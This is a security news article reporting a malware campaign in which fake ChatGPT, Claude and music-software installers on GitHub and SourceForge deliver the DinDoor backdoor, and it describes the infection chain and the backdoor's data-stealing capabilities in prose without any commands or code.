Fake ChatGPT and Claude Installers Spread DinDoor Backdoor in New Malware Campaign

Malicious Installers Target AI Enthusiasts

A new malware campaign is deceiving content creators, gamers, and AI enthusiasts by offering fake installers for popular software tools such as ChatGPT and Claude. These counterfeit files, hosted on well known platforms like GitHub and SourceForge, deliver a powerful backdoor named DinDoor. The attackers have also compromised YouTube channels, using AI generated videos to drive traffic to the malicious repositories. Some of these videos have already garnered over 50,000 views, indicating a significant reach and potential for widespread infection.

Contents

Malicious Installers Target AI Enthusiasts Infection Chain and Capabilities

Security researchers at Malwarebytes identified the campaign after discovering suspicious installers and plugins impersonating not only ChatGPT and Claude but also Ableton Live, AutoTune, and Kontakt. By leveraging the inherent trust users place in GitHub and SourceForge, the attackers make their fake projects appear legitimate, luring victims into downloading the harmful payload.

Infection Chain and Capabilities

Once a user visits a compromised repository and executes a copied command in their terminal, thinking they are installing genuine software, the infection begins. The command silently downloads an MSI installer file and runs it through Windows’ built in installer tool. This MSI file then deploys a CMD file and a PowerShell script onto the victim’s system. The PowerShell script proceeds to install the Deno JavaScript runtime using standard Windows package managers like Scoop and WinGet, furthering the attack.

After installation, DinDoor establishes a connection to a command and control server, enabling the delivery of a full featured remote access Trojan. This RAT can steal data from browsers and cryptocurrency wallets, capture screenshots, record clipboard activity, and even spy on victims through a hidden video stream that uses the Microsoft Edge browser as cover. The backdoor’s capability to remain undetected while exfiltrating sensitive information makes it a serious threat to both individual users and organizations.

Source: Cyber Security News

Fake ChatGPT and Claude Installers Spread DinDoor Backdoor in New Malware Campaign

Attackers are using compromised YouTube channels and trusted platforms like GitHub to distribute fake installers that deliver the DinDoor backdoor, compromising systems of AI enthusiasts and content creators.

Malicious Installers Target AI Enthusiasts

Infection Chain and Capabilities

Trending

Microsoft Defender for Endpoint Gains Automatic Network Isolation for Hacked Workstations

Notepad++ Urgent Update Fixes Two Critical Code Execution Flaws

ISC Warns of Remote Exploit Risks in BIND 9 DNS Software

Evaluating Static Application Security Testing Platforms for Modern DevSecOps Pipelines

Media Firm Fined for Faking Phone Listening Capability in Ad Targeting Scam

Related Stories

Webworm Hackers Add Discord and Microsoft Graph API Backdoors to Toolkit

Active Attacks Target NGINX Buffer Overflow Flaw

Automated GitHub Supply Chain Attack Hits Thousands of Repositories in a Day

GitHub Tightens npm Security with Staged Publishing and Install Source Controls